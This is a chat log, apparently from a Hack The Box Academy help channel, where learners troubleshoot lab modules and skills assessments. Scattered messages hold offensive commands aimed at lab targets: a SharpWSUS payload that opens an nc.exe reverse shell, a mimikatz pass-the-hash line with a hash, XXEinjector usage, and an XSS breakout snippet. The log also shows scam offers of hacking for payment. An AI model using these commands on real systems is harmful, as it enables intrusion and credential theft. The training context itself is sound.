yeah there are some free ones i think
Thank you for your help!
Quick question. I'm on the DNS footprinting module and I can answer the first three questions but the last is asking what the fqdn of the host is where the last octet ends in .203. I don't know how we arrived at the answer. anyone care to dm me? Sorry if this is the wrong place
Can you tell me how you chmod and then what command you used?
Did you use sudo ssh too, and did you copy --begin-- and --end-- to your file? But make sure it’s in a directory you have permission over too, sometimes that can be the issue
Has anyone had any issues with the AD Enumeration & Attacks - Skills Assessment Part I? The target ip's url works for about 20 minutes, then my reverse shell fails and won't work again. I've spawned a new IP several times, and I switched vpn servers 4 times now. I don't have any other VPN's running, but this issue keeps persisting.
yo guys im on
common application attacks
attacking SQL databases
ive connected to target's MSSQL using impacket mssqlclient.py
running select name from dbo.sysdatabases; doesn't show any DBs
although when i use use msdb it switches databases
why databases not showing ?
Applications of AI in InfoSec-Skills Assessment. Locally my model is getting 90%, but this is what I get when I submit it.
Where can I learn the CPU architectures for buffer overflows?
Is intro to binary exploitation enough stuff for that?
The meme Emotional Damage is ringing very loudly atm xfreerdp /v:localhost:1234 /u:REDACTED /p:REDACTED /cert:ignore /drive:Shared,//home/joshuagraham/hackthebox
[02:34:02:281] [59884:59885] [ERROR][com.freerdp.core.connection] - Timeout waiting for activation
[02:34:02:287] [59884:59884] [ERROR][com.freerdp.core] - freerdp_abort_connect:freerdp_set_last_error_ex ERRCONNECT_CONNECT_CANCELLED [0x0002000B]
So I'm doing the AD skills assessment part 1 lab, and I've been struggling with the target machine for about 2 hours now. So far it's been working, but when I set up port forwarding in metasploit, and try to rdp into the MS01 machine, it keeps erroring out no matter what I try. Just very frustrated and demoralized at the moment😂
Also I've switched VPN servers a few times prior to this to hopefully curb the Target IP from failing after about 20-30 minutes which so far that part has been working
use the tcp vpn
I have been, I've been only using tcp vpn since I initially started having issues with rdping into window machines. Right now this command has just been hanging and I'm hoping for the best lol
xfreerdp /v:localhost:1234 /u:REDACTED /p:REDACTED /cert:ignore /drive:Shared,/home/joshuagraham/hackthebox
I'll try that, hopefully it works, and thank you for your help
I don't have experience with forwarding through msf, I used ligolo
I'll have to check that out, I've never heard of it
If you get the underlying principles, it's way better
I'm definitely going to look into that now! This has been a complete pain and I know once I complete this lab I'll probably remember every single command I've used this far😂
ligolo basically works on a different layer so you're not having to use weird port forwarding techniques
the only port forwarding you typically need is to allow for multiple pivots
Ahh ok that actually seems pretty interesting, I didn't know there was multiple ways you can get onto the MS01 machine
multiple ways to pivot
also; i believe the question states to authenticate to, it doesn't specify RDP iirc
That's actually a good point I didn't even think about that. This entire path has been the most challenging so far, but not having any professional IT experience I think I'm doing half decent, although I'm definitely going to have to go through all of these modules again before attempting the CPTS exam
Hey there guys, I have a question about hydra in a skill assessment :
I have been trying to bruteforce a password with a found user, I have had confirmation that the user is the good one, but for the life of me, I don't understand why hydra "times out" like this. I cannot finish one 1000words wordlist before it crashes out.
Is the machine "at fault" ? I've tried adding a longer wait time to mitigate a slower response time, but no success either
- Multiple failed attempts
- Am a dumbass who does not know how bash variables work : For the next person who will have this problem, '$USER' is actually $USER, while "$USER" will give out the content of the $USER variable
- Problem solved ✅
I have
free for a DM ? either the lab is broken or my mind is xD
Ye
Can you someone help on this? I think my answer is correct. Android Fundamentals
- Native Code
What is the name of the function that returns the string inside the cpp file? (Format: FunctionName()). answer: ||stringFromJNI()||
Hie I am new to hack the box
Anybody can help me in how to do tasks module challenge etc etc
which module you are working on?
I just started using hack the box
Get Started with the HTB Beginners Bible: https://www.hackthebox.com/blog/learn-to-hack-beginners-bible
if you wanna do modules tho
try doing this first https://academy.hackthebox.com/module/15/section/32
I have a query in exercise part
is ok I found the answer.
Tell module name and topic(sub module) and your query
Answer the question(s) below to complete this Section and earn cubes!
Target(s): Click here to spawn the target system!
- 5 Start the above target, copy the shown IP:PORT by clicking on them, and then paste them in your browser. What's the proof shown in the page?
I just copy paste in the browser but still saying wrong answer

I think you need to Connect VPN. and then browse the IP of the target system. You will get the answer.
oh oops, sorry
thanks
I got the answer thank you
Completed this module can you help me which module should I do next
One minute you think that new Rebel Cracker badge is cool and you try to do the module and the next you're submitting a PR for hashcat
So the thing is that I'm not really sure how to proceed from a methodology standpoint. Here SMB was open so I should try discovering its version. would this necessarily be the case on other technologies? And even here, SMBv1 is open but searching for "smbv1" in Metasploit brings up no relevant results. I'm trying to understand how to approach these things instead of outright just solving this particular question.
I appreciate any feedback.
https://app.hackthebox.com/starting-point . ftp -h answer doesnt work.
What is the command we need to run in order to display the 'ftp' client help menu? this is question
I did it... Christ, it was painful 🥵
This is not the right answer. ftp does not have a -h switch
Because there is no -h for the ftp command
oh
you get the help output because it does not know how to interpret the -h. Depending on the version you are using it should say that in the very first line
oh got it . those blog post gives wrong answer
thanks
Could you give me a nudge
Did you use rockyou ?
I used get to dl each file. Did cd .ssh and used touch to move them there.
You could try Learning Process or Linux/Windows fundamentals
Looking at the Information Security Foundations path, this could be good to follow, i believe the first module you completed in this path anyway
Sure DM
Get Started with the HTB Beginners Bible: https://www.hackthebox.com/blog/learn-to-hack-beginners-bible
@azure lantern ^
Hello I just started learning . I am stuck in one question "Using what you learned in this section, determine the type of encoding used in the string you got at previous exercise, and decode it. To get the flag, you can send a 'POST' request to 'serial.php', and set the data as "serial=YOUR_DECODED_OUTPUT". Effort : I just found which type of encoder for this data from previous exercise and found out it was base64 and then decode it accordingly and put the result into solution box . But it is telling me wrong result. I don't know why it is getting wrong result. Could anyone please help me to fix the issue ?
Can I get the link something for what are you aiming to
Yes sure
Okay I will just go through
Or enroll into information security foundations skill path, that way when you finish the module, you can click continue and it will send you to the next module
is it possible to send responder.py to a target machine that has no internet connection? its as if i need a connection to install it somehow
You could base64 encode it then decode it on the target
@quartz sundial here.
oh i can send the py file, it just needs dependencies
anyone done the Escape box recently and tried the alternative approach? even when i execute the walkthrough commands i get an error trying to connect to mssql (Login failed. The login is from an untrusted domain and cannot be used with Integrated authentication.)
Hello ,
Can some one kindly help me I am stuck at Advanced Command Obfuscation :
Or if some one can confirm cause I tried the answer from the "ShowSolution" and did not work
Best to ask in #boxes for box help
Scp
Hello guys,
I am having some issues on this question:
API Attacks - Broken Authentication - Exploit another Broken Authentication vulnerability to gain unauthorized access to the customer with the email 'MasonJenkins@ymail.com'. Retrieve their payment options data and submit the flag.
I am exploiting the right endpoint, but every time I try to generate a OTP, I get ("SuccessStatus": false). I tried to do it authenticated and not authenticated.
Someone could help?
Web Attacks > IDOR > Bypassing Encoded References
- I'm trying to do the assessment, but when trying to use the scripts and even manual curl commands, I keep stumbling with "Contract Name is not defined."
Appreciate any insight, thanks
Can someone here give me a nudge with the file upload skill assessment pls? I cant locate my file i am using the correct date format i think but i keep getting a 404 error
Off the top of my head, you need to read some source code... I will leave it at that
In the File Inclusion -> PHP Wrappers section, not sure why but the expect wrapper doesn't return anything even though it's enabled. I tried the curl command and a manual request through Burp and neither output anything back in the body, not sure why
Just remembered what it is, you might need to read some documentation on date formats if you're not sure you've got the correct one :p
i read the upload.php file i got the correct file location and the name of file format is correct but getting 404. i bypassed black and white list and got a successful upload message. the server is giving todays date when i use curl to check the date so no clue whats wrong
i know the difference between Y and y for php date if thats what you mean
If you get a 404 then you don't have the correct file location, which means you probably don't have the correct date format
Let me know if you want me to DM you the specific answer
i am a new person into the field of ethical hacking, where can i discuss more about advices?
Im doing this part of password attacks
Passwd, Shadow & Opasswd
what is the password list that I should use?
What deep learning architecture, known for its ability to process sequential data like text by capturing long-range dependencies between words through self-attention, forms the basis of large language models (LLMs) that can perform tasks such as translation, summarization, question answering, and creative writing?
ChatGPT
really could use a hint for file upload skill assessment here
Module: Web Attacks
Page: Blind Data Exfiltration
Hi, I’m currently working with the XXEinjector tool and running into some issues. I’d like to share the command I’m using along with my xxe.req file (which includes the required headers and the XXEINJECT keyword) to get some help.
For some reason, the tool isn't working as expected — it just returns the help output, as if one of the parameters is incorrect. I’ve double-checked everything but still can’t get it to work.
Would it be okay to share my code and setup here for troubleshooting? Or is there someone I can directly reach out to for support?
Ok . i use chatgpt. and i always get "Transformer Architecture." and i put it in the answer box, but its wrong. whats now the answer?
hey guys
just paste the command you're running
ruby XXEinjector.rb --host 10.10.15.250 --httpport=8000 --file=/tmp/xxe.req --path=/etc/passwd --oob=http --phpfilter
This is the file at /tmp/xxe.req
POST /submitDetails.php HTTP/1.1
Host: 10.129.255.191
Content-Length: 126
Accept-Language: en-US,en;q=0.9
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.6723.70 Safari/537.36
Content-Type: text/plain;charset=UTF-8
Accept: /
Origin: http://10.129.255.191
Referer: http://10.129.255.191/
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
<?xml version="1.0" encoding="UTF-8"?>
XXEINJECT
MyIP 10.10.15.250
Target: 10.129.255.191
what's the command output?
Displays the help menu
XXEinjector automates retrieving files using direct and out of band methods. Directory listing only works in Java applications. Bruteforcing method needs to be used for other applications.
Options:
--host Mandatory - our IP address for reverse connections. (--host=192.168.0.2)
--file Mandatory - file containing valid HTTP request with xml. You
which is the same as the README file
try --host=10.10.15.250 (= instead of space)
np
In login bruteforcing module skill assessment 2 i am bruteforcing the ftp user locally with multiple list created from cupp and username anarchy thousands of words and nothing came up any hint ?
Who can hack
@green shuttle join..
Click the link abov
I can
Did it
For free ?
Yep
Okay
can we ban these guys or
fr only a matter of time😪
thought they were a part of the support team but they are just a scam
Having an issue double pivoting in msf, portfwd add -R -l 8081 -p 1234 -L <attack-ip> isn't working as intended. The double pivot host seems to be connecting to the first pivot host but msf isn't able to catch the shell
they want a wallet or something
Classic grift they won't last long here
Has anyone gotten a "ERROR][com.freerdp.core.transport] - [transport_default_write]: BIO_should_retry returned a system error 32: Broken pipe"
Error when trying to xfreerdp3 into an endpoint?
For context I'm doing a CDSA module in the "Windows attack and defense" path
Module: API Attacks
Page: Broken Authentication
I am exploiting the right endpoint, but every time I try to generate a OTP, I get ("SuccessStatus": false). I tried to do it authenticated and not authenticated.
Someone could help?
If someone has the same problem in the future.
The email is case sensitive, don't change it.
I think I get this error when my user does not have rdp permissions. Might be confusing this with another error though
But but I'm using the credentials it's giving me ugh
Guys any program that helps new ppl like cheat engine?
Are you able to use a different authentication method like winrm
I can try that. I am just confused. I am doing the same thing I've done with all the modules before this but can't rdp into this new target
Okay at least now the error changed to "[ERROR][com.freerdp.core.transport] - [transport_check_fds]: transport_check_fds: transport->ReceiveCallback() - STATE_RUN_FAILED [-1]"
Sometimes legitimate users are not allowed to rdp. You can validate that your credentials are correct using crackmapexec or nxc if your target has an open smb/ldap port
Oh good freaking grief
I forgot to add /cert:ignore to the command line
Sorry for bothering
Lol sometimes its the simple things no worries
yup joined and got out they told me i needed a wallet to get the access i wondered if that was a new feature in HTB
No no, long story short, if you need HTB support, there is only 1 source
and thats the website
Need to speak to a person? Learn how to reach our support via HTB Labs.
i know i was kidding
glad you are safe
can you help me with a question regarding a module
I think it's a mix of that and I might be attempting to connect too quickly to these boxes. Made it through that previous module, and now am working on a different module and getting the same rdp issues
Might need to give these windows boxes a few more minutes before trying to mess with them
Hey, I am currently working on Skill ass part 1 on Windows privesc module and a little help needed here:) I have a question regarding second task. Specifically regarding kernel enumeration. But don't wanna spam here, anyone dm?
dm me if want 🙂
Hello everyone please help can I see a legit spammer who create all kind of hacking tools on office 365?
what?
Can i DM someone about the file upload skill assessment?
frustrated from all the 404 errors im getting/
did you manage to bypass the filter?
yes client side and backend but just getting a 404 error once i upload my file
when i browse to execute cmd= i get the 404 error
use another way to abuse it if you have the right extension that allows you to do malicious things
Here is the modified message for JavaScript encoding and decoding. Please let me know if anyone knows how to resolve the problem. I keep getting the same message but don't know why. I don't know where I made a mistake: echo -n "N2gxNV8xNV9hX3MzY3IzN19tMzU1NGcz" | base64 -d
7h15_15_a_s3cr37_m3554g3"
curl -s -X POST -d '{"serial" : "7h15_15_a_s3cr37_m3554g3"}' http://94.237.123.126:35472/serial.php
N2gxNV8xNV9hX3MzY3IzN19tMzU1NGcz
||curl -s url -X POST -d "serial=secret"||
Hello, sorry if this question sounds stupid, but I've just started with HTB, and it's day 3 of my cybersecurity learning journey. I have a question about the "Information Security Foundations" path skills. Where can I ask about this in the forum? I'm currently trying to set up ParrotOS via Pwnbox. According to my information, Pwnbox should be accessible via the settings, but I don't have it in the menu. Thx! 😊
😦
you don't "set up ParrotOS via pwnbox" pwnbox uses ParrotOS
Okay thx! But where do I find Pwnbox. It's not in the settings.
Hello, I have a question. I'm just getting started on the platform. I'm currently in the Linux Fundamentals module, in the System Information section. The practice exercise says I should connect to the VPN and then connect via SSH. I can see the username and password, but I don't see the port. How can I connect in order to answer the questions?
Hehehehe, I’m connected now — I was entering the wrong IP 😛
I was wondering if there was someone I could talk to about the file transfer module Linux subsection if there could be a change to this section
Hello guys
@barren geyser No. This is not a hacker for hire server.
you found only phar.jpeg as extension filter bypass ?
Stack-based buffer overflow on Linux (xc2 in memory)...
Throwing this in because it took me way too long to figure out:
- python3's print works differently than the presumably python2 this module was written in.
- in order to make this code work, you have to use sys.stdout.buffer.write() instead of print and give it bytes, not str.
Or... just use python2 
Otherwise using pwn library is what most do instead
giving folks the info because it was never answered in the forums
✅ mission Rebel cracker 🔓🔑😎
i changed to shell.php.png. file uploaded but still got 404
you don't have the right extension search well
ah yes and when you make intruder uncheck the small box
you are fuzz the content-type for see what acceptable ?
hey all, is this the right place to ask questions if im feeling stuck in htba and need a nudge in the right direction? Not necessarily looking straight for the answers
Im in the getting started module, and ive hit a blocker in the section that it teaches how to use metasploit to run exploits on vulnerable software. ive identified a wordpress 5.6.1 running on the target server, but im stuck from there as googling vulnerabilities brings me too much information and searching "exploit wordpress 5.6.1" or something similar on metasploit doesnt seem to bring me anything useful :c
Have you tried looking around the target website itself for clues?
Yup, It says the plugin name and a directory that it stores backups to. I've tried searching for the plugin name in metasploit, found 1 result but its an auxiliary. I've run it, and it gave me a txt file with a lot of information that i think are usernames that it tested
So you found a working exploit that reads files?
Maybe you could read something else.. like the flag
So thats the part that im kind of stuck at... metasploit lists it as an auxiliary, but i cant find an "exploit" with the plugin name
i dont know if im too focused on trying to find something that explicitly says exploit or if auxiliaries are just as good
You are using an exploit to read files from the machine.
ohh understood. so pretty much everything, whether it says exploit or auxiliary, are exploits?
no not always
but this module allows you to read files from the system.. what is the question asking you to do?
it asks me to find a flag, the webpage hints that the flag is in a directory in wordpress
ok, so it wants you to read a flag. you have an exploit to read files.
my instance died just as i think i was about to solve it hahaha. imma crack my head a bit on this and if im still stuck after a lot of attempts ill be chatting here again, although im pretty sure i should have it solved
ty for the help! you set me in the right direction but in the end one of the main reasons i couldnt solve the problem was because in the exploit i was configuring it wrong. I wasnt using the "set filepath" option, instead I was using the "set targeturi" and placing the file directory there and i had no results (because i hadnt configured what I needed it to search for... hahaha). thanks again 🙂
Hello, I'm having an issue with running nmap through proxychains. I'm following the instructions exactly and can access things on the internal network such as through curl or firefox, but when I try to run an nmap scan it says all ports are non responsive. I am using the -Pn and -sT flags for nmap. Any suggestions on what I can fix?
try --proxy if using proxychains doesn't work
Where would the --proxy go? I don't see it anywhere in the nmap manual
My command is nmap 172.16.5.35 -Pn -sT -v --proxy socks4://127.0.0.1:9050, I'm connecting to the host through ssh and exposing port 9050 with ssh -D 9050, and I'm still getting no ports open from nmap. Do you see anything wrong with my commands?
In RFI > Remote File Inclusion (RFI)
I can't get SMB file inclusion to work even though my share works (I can connect to it with smbclient) and every command also returns:
Notice: Undefined variable: p2 in /var/www/html/index.php on line 48
So I think there might be an issue with the server? Not sure
Actually I did LFI on the server to read index.php and it does try to echo an undefined variable on line 48....
Try using socks5
@sturdy citrus Please do not post content from modules above tier 0.
@plain hare Please do not post content from modules above tier 0.
someone here had a question about xss phishing can't remember who it was but now that I'm on my laptop:
you need to escape the context of the img tag using techniques from previous sections. Probably what you're looking for:
||'><script>document....</script><!--||
Hey Guys, I am doing pivoting tunneling module in the first section after introduction I have to rdp into a machine after dynamic port forwarding xfreerdp is not working
If you’re seeing a black screen, try pressing enter
No I am facing time out error
Rdesktop is working but saying wrong creds because it doesn't support NLA
Try with Remmina
Okay let me try
I’m not sure about why it times out, maybe someone else has more info about why 😅
Ah okay, anyways thanks for help
Okay so I managed to get the flag, not the intended way, but after setting up your dynamic port forwarding and proxychains you can use evil-winrm to connect to windows, but still rdp is giving timeouts even after creating the kerberos file
Probably due to having to pivot, you could increase the timeout threshold or use TCP
Is there anyway to hide the cpts attempts blocked banner
It is mildly bothering me
Thanks for the suggestion will try it
aye some legend can help me with "logrotate" page on linux privilege escalation Module
please >?>?>
You can use a custom ublock rule
Where do I find on the HTB Homepage the Pwnbox. For my knowledge it should be on the settings. Thx!
The pwnbox is available within sections that have a target you can spawn and interact with.
Okay thx. I am making here my first steps in HTB with the path skills.
hi
I'm doing the Evasion module, but I think my issue has nothing to do with the course and is a general C# issue. I've made sure to create a console app and build in "release" mode. It "works" and solves the first section, but it compiles to a collection of files with a .dll being the one I had to work on evasion with (not the .exe). Obviously no one is creating implants that look like this. Is there a button somewhere I should have ticked?
in the pass-the-hash module there is an optional question asking "Optional: John is a member of Remote Management Users for MS01. Try to connect to MS01 using john's account hash with impacket. What's the result? What happen if you use evil-winrm?. Mark DONE when finish."
i am not getting this question, it is telling us to connect the same way we connected as david, using
```
./mimikatz.exe privilege::debug "sekurlsa::pth /user:julio /rc4:64f12cddaa88057e06a81b54e73b949b /domain:inlanefreight.htb /run:powershell.exe" exit
```
or through linux
Either way is fine, it's better if you can try both ways so you get to practice them
i tried using mimikatz but got the shell of admin not of user
and from the rdp connection we have taken first from there we have to connect to john or what?
So you're supposed to use evil-winrm or to spawn a powershell session because of his permissions
from kali?
No, from the current machine, because unless you know some pivoting you won't be able to connect to it from kali I don't think, unless I'm not remembering correctly
ok got it
Quick question, I did the Backup and Restore page in the Linux Fundamental course, and I found this command. Which doesn't make a lot of sense to me, cronjob is a johntheripper script present on the pwnbox, shouldn't this be crontab?
Because that is what I ran in order to replicate the instructions on my machine, and that worked as a charm. (maybe a note to add /usr/bin/ to crons path in order to reach rsync would've been useful)
a dns A record does not indicate that it doesnt have subdomains and therefore should be dnsenum-ed always
is this correct? sorry the DNS foot printing module was very confusing for me to understand what was going on
yes, should be crontab. Best to post that in #1234357888114364508
I'll do that, thank you for the second opinion ❤️
Hi everyone,
Malicious Document Analysis:Skills Assessment - Maldoc Analysis
If anyone has experience with this, I would really appreciate your help!
Not necessarily, it just depends on what DNS information the server allows you to enumerate, for instance if you're allowed a full zone transfer dnsenum is not 100% necessary
It also depends on the engagement evasion requirements wherein a more evasive test would warrant using quieter tools and methods
ey guys good afternoon. Someone can help me with module AI please?
hi.. not sure if anyone has seen this before
i used the commands from academy and only changed the ip, but it does not seem to work
are you 100% sure you did not delete a bracket or a ' somewhere
Run it from cmd instead
Oh they are different?
Increasing the timeout worked
I saw it in the guide saying run it in the powershell that’s why I did that
In your case the variables get evaluated in the parent shell, so the command breaks.
Ah I see, Okie I’ll take another look, thank you!!
Hey
Hey guys, I have created a dynamic tunnel with pivot host so I can connect to the rdp and execute my payload and I have also created a reverse tunnel but after executing I am not receiving shell here are the commands I used
I am doing Remote/reverse port forwarding with ssh in pivoting module
@cold star Please take care not to post content from modules above tier 0
Under Android Fundamentals, Android Debug Bridge, I have already successfully emulated Pixel 4 and performed all the necessary steps, but myapp.apk does not show in the Pixel 4 and there is no flag.txt in /sdcard/Download/. Does anybody know what could be going wrong?
Okay 
I'm currently working on the Domain Trusted Attack module on Hack The Box Academy, but the connection is extremely slow and unstable—even after switching VPN servers.
After connecting to the Linux box, I need to use xfreerdp to access a Windows box. However, during this process, the RDP session keeps freezing or disconnecting.
Is there any way to stabilize or improve the performance of this connection?
Try changing regions. ie. EU -> US or US -> EU
also you can make configuration changes to help if need be https://help.hackthebox.com/en/articles/9297532-connecting-to-academy-vpn
I'd also recommend TCP VPN instead of UDP
Snaffler: if I dump output to a file and transfer to another system (linux or Windows) how can I get the color to highlight? I see the {Red} {Yellow} {Green} tags, etc, but if I "cat" or "type" the log in Linux or Windows respectively the colors won't display.
Thank you for your advice 
ey guys someone had completed the module AI?
anyone can help me in spawning a reverse shell using wsus? windows lateral movement module optional exercise
I obtain error: the files for this update failed to download,
using Get-WinEvent I see that it fails to download psexec but even after copy psexec in the wsus folder with the expected name I obtain again the error, that because in my opinion in the payload of psexec is present also \tools\nc.exe, but I would expect another event for a different failed downloaded file... instead I keep having same error on same file
Im using || .\SharpWSUS.exe create /payload:"C:\Tools\sysinternals\PSExec64.exe" /args:"-accepteula -s -d cmd.exe /c 'c:\tools\nc.exe <myip> 9001 -e cmd.exe'" /title:"TestREV" ||
@vernal tapir Please do not spoil contents from modules above tier 0, especially details about the skill assessment
I had luck with a SnafflerParser project that parses output, even better than getting color out of the output logs.
I'm so sorry honestly, what's the best way to ask for advice, while still giving enough information for someone to respond? I know it's a hard one for me to see what I can/can't leak you know.
Like don't share specifics etc
Just ask without revealing details like which ID is the admin, etc. Or ask for someone to DM you if you feel like you need to say more things. Anyone who has completed the modules and can help doesn't need the specific details revealing stuff like that.
Yeah that's very true, thank you
In the LFI module, it states "The most common LFI tools are x/y/z" but that they're all unmaintained, is it worth my time learning those or should I just stick to ffuf?
I tend to prefer ffuf over specialized tools personally anyways
ffuf isn't really an LFI tool but rather a web fuzzer
Wouldn't these tools just do web fuzzing tailored to LFI detection anyways
Are you still messing around with this one?
which module/section? i'm not seeing any tools in the lfi and file uploads section of the file inclusion module
Bug Bounty Hunter -> File Inclusion -> Automated Scanning, last paragraph "LFI Tools"
the age of the tool doesn't really matter. it also doesn't really matter which tools you use. use what you like, whatever you're comfortable with, etc. some tools may give different results sometimes though, so it's not bad to have alternative ways of doing things.
Ok, I'll try them out then, will probably end up sticking to ffuf though
you can probably hammer that nail in with a wrench, but a hammer is just going to do it better
and i'm not talking about lfi specifically just in general with tools
Hi, if anyone has done the Web Attack Skills Assessment and don't mind giving me a hint or two shoot me a dm or reply please 🙂
dm sent
Hi I am having issues with Linux privesc skills assessment - client_loop: send disconnect: Broken pipe on ssh just after few seconds of login
Hey, I'm interested in hacking and everything around it. If you find it interesting too or just want to chat, feel free to send me a message.
hey all im stuck on a ffuf question, cant seem to figure out what im doing wrong
Wuzz the question
im running a parameter scan on the page but the response status accross every attempt is the same
That’s the issue, not the question. What is it asking you to do?
Using what you learned in this section, run a parameter fuzzing scan on this page. what is the parameter accepted by this webpage?
Pm me what you’re trying
sure
Can someone verify it, are you facing this? Because it's really annoying, I have tried changing my vpn file, using pwnbox, stabilising the shell, getting a revshell from the ssh and changing internet but still it's the same every time.
still i'm stuck at AI 😦
I am working on HTB Academy - Attacking Common Applications - Attacking ColdFusion. The module asks "What user is ColdFusion running as?"
I have a reverse shell via the ColdFusion exploit they mention in the module text. I run commands that show all of the users on the CF host machine. The module doesn't accept any of them as the correct answer
I've also run commands that show what processes are running on the machine. and which users are running those processes. The module doesn't accept this user account as the correct answer.
Some can help me with the lesson question "PoC Patching and Null Safety" ?
so my VM is running, parrotOS won't open. it's open for a second, that's it. any suggestions!
Revert to a previous snapshot if you have it or maybe reinstall? not sure what you mean by you have the VM running but the OS won't "open."
Hi guys. I'm stuck at Pivoting section of Intro to C2 Ops with Sliver module. I am following the exact same steps to try and reproduce the pivot but for some reason it doesnt work. Modified proxychains.conf, compiled the go chisel for sliver and added it to the directory and restarted, set up the server and then connected using chisel client. My chisel client connects to my server but when i use proxychains with crackmapexec it just doesnt respond. I think the problem could be my chisel server. Did you guys use the default chisel server that comes in the pwnbox?
hi guys, I stuck at web enumeration because "url not found". i am trying to open login page so I can log in and retrieve the flag, but I cant
try http not https
tried both, with and without port number
which module is that?
Getting started (Offensive)
tried them all, gobuster works and I can open the site as seen on scrshot
but when I try to enter log in page 94.237.59.174:31910/private, I cant
see web source code or subdomain, dns. It is for sure one of the techniques described in the section.
https://academy.ule/112/section/1079
Footprinting Lab - Medium
Footprinting
I cant seem to find the user for the one question
ok, thanx, solved it! 🙂
Why can’t I message in general lol
Anyone else having trouble connecting to target machines on Academy despite being successfully connected via openvpn? This is very strange and only started last night. I've tried everything I can think of (trying NAT and Bridged from VMWare Parrot OS, restarting the computer, flushing cache) but no matter what I do, or how many different HTB servers I try, I can always successfully connect via the given ovpn file, but cannot reach any of the targets, including targets I previously had no problem reaching in earlier modules. "ip a" shows that the tunnel is up, and I can ping the tunnel gateway and get a response no problem, but I cannot for example ssh into a target box (where this had worked previously). It feels like I'm hellbanned from the network or something. I appreciate any help, or if anyone has any advice. Unfortunately this is totally halting my ability to go through any new sections, and it was going great before. (Also for some reason the ability to chat with help is disabled for me)
reach out to support
Need some help? Learn how to reach the support team on Academy.
Thank you, I appreciate the response. I reached out via email but for some reason the ability to open a ticket or send a message to the help team is unavailable for me. I've tried on three different computers, my phone, someone else's phone, and still don't have the ability. No adblockers, fresh install of browsers just to make sure. If I've been banned from the feature I don't know why but apologize.
Yeah it seems very odd to me too. I just figured maybe this was an issue affecting everyone? I really wanted to be sure it wasn't just a browser issue or something.
it's working fine on my end
- Browser: Chrome
- System: ChromeBook/ChromeOS
Thank you, good to know
Would you mind sending me some sort of hint on this? I've been in circles with an executable that, when run on the dev box, does create a revshell. But when put in this folder never connects and produces the same log @shut wraith had. Given the static section had requirements not described in the module I suspect you have a similar hint for this dynamic section.
Send me a DM
I need my old discord account unlinked from my hackthebox account
you can dm me
@gray yacht I finally completed the section we were working on
super cool. I still gotta fix my kali vm but I got this working
I got the flag
double pivoting section completed
I am currently running into something weird with the following question in 10 - Password Attacks and would appreciate a nudge
Q - Check the /tmp directory and find Julio's Kerberos ticket (ccache file). Import the ticket and read the contents of julio.txt from the domain share folder \\DC01\julio.
As expected, I have 2 ccache files for Julio, one's expected and one shouldn't be...except they're both expired between the time it takes me to import, set the variable and smbclient in to get the .txt file
Screenshots attached
Redoing it again shows the file size as 0 now
By the time I get the refreshed ccache file and go through the process again, its already expired
Hey, was wondering if someone could help me by explaining why some URL parameters would prefer + instead of spaces, just spent way too long on a module where my URL encoding kept failing because I was encoding spaces instead of +.
how do i get started it confusing
Get Started with the HTB Beginners Bible: https://www.hackthebox.com/blog/learn-to-hack-beginners-bible
Hello, I am currently doing the file uploads module and it contains a lot of testing/uploading of different file types to the testing server. I was wondering, in a real life situation, wouldn't this be a major trigger point for security systems of any organisation?
Of course this would be discovered quickly, but it has no relevance for the bug bounty, because if it is in scope, you are allowed to do so
So this method is not recommended for real life pentesting, only for bug bounty and maybe ctfs
You can also use such scans for pentests, if it is in scope
Okay thanks!
Anyone available for #modules message ?
NEED HELP :- In CPTS 5th module in Vhost enumeration, they give us both IP and domain name but only the IP works and the domain name isn't resolving
- I am connected with VPN
- I added the entry in etc hosts file
My domain is inlanefreight.htb and the target IP address which I received after clicking spawn target is 83.136.252.217:47513 now how can I use gobuster on this ? Domain is not resolving and gobuster unable to find any hosts on IP 🥲
I also tried via pwnbox but I am not even able to ping the domain which was given for vhost fuzzing 🥱
You need to add it to the hosts file as mentioned in the module
I added the domain with the target IP in my /etc/hosts file but still I am not able to surf the website via domain, the domain is inlanefreight.htb
what exactly are you putting in the /etc/hosts file?
Ya
Anyone else had issues on the web exploit thick client applications module, im following the first steps and it will not let me execute the new java file it just does not load up
yeah... there's a bunch of issues that that can be
just watch ippsec fatty
Even pwnbox wasn't able to surf that domain but IP does works
I ask again: what did you put in /etc/hosts? exactly?
Yes brother yes
What do you mean yes? Show me what you put
identify your account first to send photos, instructions -> #welcome
Ok I catch you in few minutes
Is it possible to take an exam after completing a path with a student subscription, without paying additional fees? or are the path and the voucher different?
Hey, I am not able to find account identifier
I am following the steps but I don't see any name account identifier in my user settings on HTB
you on app.hackthebox.com and not academy.hackthebox.com ?
You can complete the path on a student sub but you still need a voucher to take the exam
Thanks
Hello, I looked at htb-student's permissions and why is the answer to this question "What non-default privilege does the htb-student user have?" not Remote Desktop Users?
The printed permissions are as follows
Local Group Memberships *Remote Desktop Users *Users
Because it asks for privilege and not group membership
oh, thank you
Do any one have the writeups for the last HTB-CTF-CU
I found it
Identified
remove the :<port>
Still not working sir 😰
i found two Privileges (SeChangeNotifyPrivilege, SeIncreaseWorkingSetPrivacy) But they're not the answer.
i used command => whoami /priv
use the port after the domain
Still not working 😰😰🥲
http://inlanefreight.htb:<port>
gotta specify the http protocol cos it goes straight to google if not 
Ok but it's not same with other modules 🥲. Trying......
Blame your browser, it automatically chooses whether to use a protocol if it's an ip or search if it doesn't recognize it as an ip or domain
Now it works
I am able to surf that site 😎
Thanks sir, now I am trying to solve the lab
you might want to use an elevated shell
thx! i solved
deleted the image cos it contains spoilers for the lab
Please don't spoil module assessments
Hey guys, I am doing password attacks network services
I am trying to crack rdp password using hydra but it's taking centuries
Like it's check 4 combination per minute and I can not increase it and ncrack Is not also working
Hydra is showing 98 hours to crack the password
O sorry I am new, I forget, does it contain any answer of the module ?
Yes you don't share answers of module above tier 0
Can anyone help me with premature session population? Im following exactly the steps and it doesnt work
Did you already get the answers to the previous questions? RDP is question 3 right?
Yes
I managed to get all answers except rdp one
Ok did either of those two first questions potentially provide some form of access you could use to enumerate that group?
Might be able to tune your attack a bit better.
Yea but they are different user I can perform attack in the network's but it will change the motive of the module
You can DM if you'd like.
Thanks
Please help i was doing module password attacks and im at network services
Q. "Which account has WRITE_DAC privileges over the \pipe\SQLLocal\SQLEXPRESS01 named pipe?"
I tried running accesschk.exe /accepteula -v \\.\pipe\SQLLocal\SQLEXPRESS01, but I got the error:
'accesschk.exe' is not recognized as an internal or external command, operable program or batch file.
I cannot download accesschk.exe on my VM. Is there any alternative way to check the WRITE_DAC permissions without using accesschk.exe?
Ok boss I keep in mind
